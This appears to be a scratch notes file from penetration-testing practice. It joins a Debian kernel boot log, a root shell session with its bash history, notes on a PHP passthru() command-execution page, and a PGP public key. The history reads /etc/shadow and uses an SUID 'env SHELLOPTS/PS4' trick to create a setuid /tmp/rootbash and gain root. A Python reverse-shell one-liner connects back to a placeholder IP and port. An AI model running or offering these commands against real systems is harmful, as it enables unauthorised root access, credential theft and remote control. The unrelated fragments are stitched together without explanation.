1387Jan 17 19:55:44 debian kernel: [ 1.033794] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input1
1388Jan 17 19:55:44 debian kernel: [ 1.034500] rtc_cmos 00:05: rtc core: registered rtc_cmos as rtc0
1389Jan 17 19:55:44 debian kernel: [ 1.034576] rtc0: alarms up to one day, 114 bytes nvram, hpet irqs
1390Jan 17 19:55:44 debian kernel: [ 1.034582] cpuidle: using governor ladder
1391Jan 17 19:55:44 debian kernel: [ 1.034583] cpuidle: using governor menu
1392Jan 17 19:55:44 debian kernel: [ 1.034586] No iBFT detected.
1393Jan 17 19:55:44 debian kernel: [ 1.034763] TCP cubic registered
1394Jan 17 19:55:44 debian kernel: [ 1.034827] NET: Registered protocol family 10
1395Jan 17 19:55:44 debian kernel: [ 1.035237] Mobile IPv6
1396Jan 17 19:55:44 debian kernel: [ 1.035239] NET: Registered protocol family 17
1397Jan 17 19:55:44 debian kernel: [ 1.035282] registered taskstats version 1
1398Jan 17 19:55:44 debian kernel: [ 1.036085] XENBUS: Device with no driver: device/vbd/768
1399Jan 17 19:55:44 debian kernel: [ 1.036087] XENBUS: Device with no driver: device/vbd/51824
1400Jan 17 19:55:44 debian kernel: [ 1.036087] XENBUS: Device with no driver: device/vif/0
1401Jan 17 19:55:44 debian kernel: [ 1.036088] XENBUS: Device with no driver: device/console/0
1402Jan 17 19:55:44 debian kernel: [ 1.036118] rtc_cmos 00:05: setting system clock to 2021-01-18 00:53:39 UTC (1610931219)
1403Jan 17 19:55:44 debian kernel: [ 1.036138] Initalizing network drop monitor service
1404Jan 17 19:55:44 debian kernel: [ 1.036154] Freeing unused kernel memory: 592k freed
1405Jan 17 19:55:44 debian kernel: [ 1.036268] Write protecting the kernel read-only data: 4236k
1406Jan 17 19:55:44 debian kernel: [ 1.062605] udev[48]: starting version 164
1407Jan 17 19:55:44 debian kernel: [ 1.209990] SCSI subsystem initialized
1408Jan 17 19:55:44 debian kernel: [ 1.239423] FDC 0 is a S82078B
1409Jan 17 19:55:44 debian kernel: [ 1.239452] Initialising Xen virtual ethernet driver.
1410Jan 17 19:55:44 debian kernel: [ 1.243025] scsi0 : ata_piix
1411Jan 17 19:55:44 debian kernel: [ 1.243138] scsi1 : ata_piix
1412Jan 17 19:55:44 debian kernel: [ 1.243166] ata1: PATA max MWDMA2 cmd 0x1f0 ctl 0x3f6 bmdma 0xc100 irq 14
1413Jan 17 19:55:44 debian kernel: [ 1.243167] ata2: PATA max MWDMA2 cmd 0x170 ctl 0x376 bmdma 0xc108 irq 15
1414Jan 17 19:55:44 debian kernel: [ 1.261421] xvda: xvda1 xvda2 < xvda5 >
1415Jan 17 19:55:44 debian kernel: [ 1.276068] xvdh: unknown partition table
1416Jan 17 19:55:44 debian kernel: [ 1.740246] PM: Starting manual resume from disk
1417Jan 17 19:55:44 debian kernel: [ 1.931552] kjournald starting. Commit interval 5 seconds
1418Jan 17 19:55:44 debian kernel: [ 1.931560] EXT3-fs: mounted filesystem with ordered data mode.
1419Jan 17 19:55:44 debian kernel: [ 5.842738] udev[275]: starting version 164
1420Jan 17 19:55:44 debian kernel: [ 6.710516] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input2
1421Jan 17 19:55:44 debian kernel: [ 6.710521] ACPI: Power Button [PWRF]
1422Jan 17 19:55:44 debian kernel: [ 6.710556] input: Sleep Button as /devices/LNXSYSTM:00/LNXSLPBN:00/input/input3
1423Jan 17 19:55:44 debian kernel: [ 6.710559] ACPI: Sleep Button [SLPF]
1424Jan 17 19:55:44 debian kernel: [ 6.710873] input: PC Speaker as /devices/platform/pcspkr/input/input4
1425Jan 17 19:55:44 debian kernel: [ 7.873021] processor LNXCPU:00: registered as cooling_device0
1426Jan 17 19:55:44 debian kernel: [ 8.910449] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input5
1427Jan 17 19:55:44 debian kernel: [ 12.712237] Adding 901112k swap on /dev/xvda5. Priority:-1 extents:1 across:901112k SS
1428Jan 17 19:55:44 debian kernel: [ 109.414393] EXT3 FS on xvda1, internal journal
1429Jan 17 19:55:44 debian kernel: [ 110.118130] loop: module loaded
1430Jan 17 19:55:44 debian kernel: [ 110.283292] sys_init_module: 'fexec'->init suspiciously returned 529170432, it should follow 0/-E convention
1431Jan 17 19:55:44 debian kernel: [ 110.283293] sys_init_module: loading module anyway...
1432Jan 17 19:55:44 debian kernel: [ 110.283296] Pid: 934, comm: modprobe Not tainted 2.6.32-5-amd64 #1
1433Jan 17 19:55:44 debian kernel: [ 110.283297] Call Trace:
1434Jan 17 19:55:44 debian kernel: [ 110.283303] [<ffffffff8107aec3>] ? sys_init_module+0x158/0x21a
1435Jan 17 19:55:44 debian kernel: [ 110.283306] [<ffffffff81010b42>] ? system_call_fastpath+0x16/0x1b
1436Jan 17 19:55:44 debian kernel: [ 116.943575] RPC: Registered udp transport module.
1437Jan 17 19:55:44 debian kernel: [ 116.943577] RPC: Registered tcp transport module.
1438Jan 17 19:55:44 debian kernel: [ 116.943578] RPC: Registered tcp NFSv4.1 backchannel transport module.
1439Jan 17 19:55:44 debian kernel: [ 117.026375] Slow work thread pool: Starting up
1440Jan 17 19:55:44 debian kernel: [ 117.026397] Slow work thread pool: Ready
1441Jan 17 19:55:44 debian kernel: [ 117.026419] FS-Cache: Loaded
1442Jan 17 19:55:44 debian kernel: [ 117.201005] FS-Cache: Netfs 'nfs' registered for caching
1443Jan 17 19:55:44 debian kernel: [ 117.326456] Installing knfsd (copyright (C) 1996 okir@monad.swb.de).
1444Jan 17 19:55:48 debian kernel: [ 130.271583] svc: failed to register lockdv1 RPC service (errno 97).
1445Jan 17 19:55:48 debian kernel: [ 130.272088] NFSD: Using /var/lib/nfs/v4recovery as the NFSv4 state recovery directory
1446Jan 17 19:55:48 debian kernel: [ 130.272101] NFSD: starting 90-second grace period
1447rootbash-4.1# history | tail -100
1448 115 ls
1449 116 cat /etc/hosts.allow
1450 117 arp -A
1451 118 arp
1452 119 arp -vpn
1453 120 arp -vn
1454 121 netstat -A
1455 122 netstat -r
1456 123 netstat -i
1457 124 netstat -g
1458 125 netstat -e
1459 126 netstat -l
1460 127 netstat
1461 128 man netstat
1462 129 netstat -tcp
1463 130 netstat -udp
1464 131 netstat -p tcp
1465 132 netstat -p udp
1466 133 netstat -p tcp 22
1467 134 netstat -p 22
1468 135 netstat -p 80
1469 136 netstat -p tcp
1470 137 netstat -p udp
1471 138 ls
1472 139 clear
1473 140 dmesg | grep /var/log
1474 141 dmesg | grep /var/log/messages.log
1475 142 cd /var/log
1476 143 ls
1477 144 dmesg | grep /var/log/syslog | less
1478 145 dmesg | grep /var/log/syslog | more
1479 146 dmesg | grep /var/log/syslog
1480 147 ls -la /var/log/syslog
1481 148 chmod 755 /var/log/syslog
1482 149 ls -la /var/log/syslog
1483 150 ls
1484 151 tail -f /var/log/syslog
1485 152 tail -f /var/log/syslog | more
1486 153 dmesg | grep /var/log/syslog > w0rd.txt
1487 154 cat w0rd.txt
1488 155 ls
1489 156 chmod 755 w0rd.txt
1490 157 ls
1491 158 cat w0rd.txt
1492 159 ls -la w0rd.txt
1493 160 rm -f w0rd.txt
1494 161 ls
1495 162 cat /var/log/syslog
1496 163 cat /var/log/syslog | less foo.txt
1497 164 cat /var/log/syslog | grep /usr/local/bin
1498 165 cat /var/log/syslog | grep /tmp
1499 166 cat /var/log/syslog | grep /rootbash
1500 167 ls
1501 168 cat /var/log/syslog
1502 169 ls
1503 170 dmesg /var/log/auth.log.2.gz
1504 171 cat /var/log/wtmp
1505 172 cat /var/run/utmp
1506 173 who am i
1507 174 users
1508 175 last
1509 176 finger
1510 177 cat /var/log/secure
1511 178 cat /var/log/auth.log
1512 179 head -5 /var/log/auth.log
1513 180 fc -l -10
1514 181 nano .bash_history
1515 182 history 100
1516 183 ls -la
1517 184 who am i
1518 185 cd /
1519 186 ls
1520 187 cd /home
1521 188 ls
1522 189 cd user/
1523 190 ls
1524 191 cd ..
1525 192 ls
1526 193 cat /etc/passwd
1527 194 cat /etc/shadow
1528 195 exit
1529 196 /usr/local/bin/suid-env2
1530 197 env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2
1531 198 /tmp/rootbash -p
1532 199 exit
1533 200 cls
1534 201 exit
1535 202 ls
1536 203 cd tools
1537 204 ls
1538 205 /tmp/rootbash -p
1539 206 exit
1540 207 su newroot
1541 208 whoami
1542 209 cat /etc/passwd
1543 210 su root
1544 211 exit
1545 212 tail -f /var/log/messages
1546 213 cat /var/log/messages
1547 214 history | tail -100
1548rootbash-4.1# id
1549uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
1550rootbash-4.1# whoami
1551root
1552rootbash-4.1# ls -la /home/user/bmillakid
1553rootbash-4.1# cd /home
1554rootbash-4.1# ls
1555user
1556rootbash-4.1# cd user
1557rootbash-4.1# ls
1558l33t.txt myvpn.ovpn tools
1559rootbash-4.1#
1560
1561
1562
1563
1564
1565
1566
1567
1568
1569
1570
1571
1572
1573
1574
1575
1576
15771. Checking if the parameter "commandString" is set
1578
15792. If it is, then the variable $command_string gets what was passed into the input field
1580
15813. The program then goes into a try block to execute the function passthru($command_string). You can read the docs on passthru() on PHP's website, but in general, it is executing what gets entered into the input then passing the output directly back to the browser.
1582
15834. If the try does not succeed, output the error to page. Generally this won't output anything because you can't output stderr but PHP doesn't let you have a try without a catch.
1584
1585
1586
1587reverse shell
1588http://10.10.202.91:8888/
1589/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,soc
1590ket.SOCK_STREAM);s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
1591
1592
1593
1594
1595
1596
1597
1598
1599----BEGIN PGP PUBLIC KEY BLOCK-----
1600Comment: https://keybase.io/download
1601Version: Keybase Go 5.6.0 (windows)
1602
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
1649JSU4mVKnCAZggCAq8fryKPS+TIFmLGc=
1650=QLLF
1651-----END PGP PUBLIC KEY BLOCK-----
1652
1653
1654
1655
1656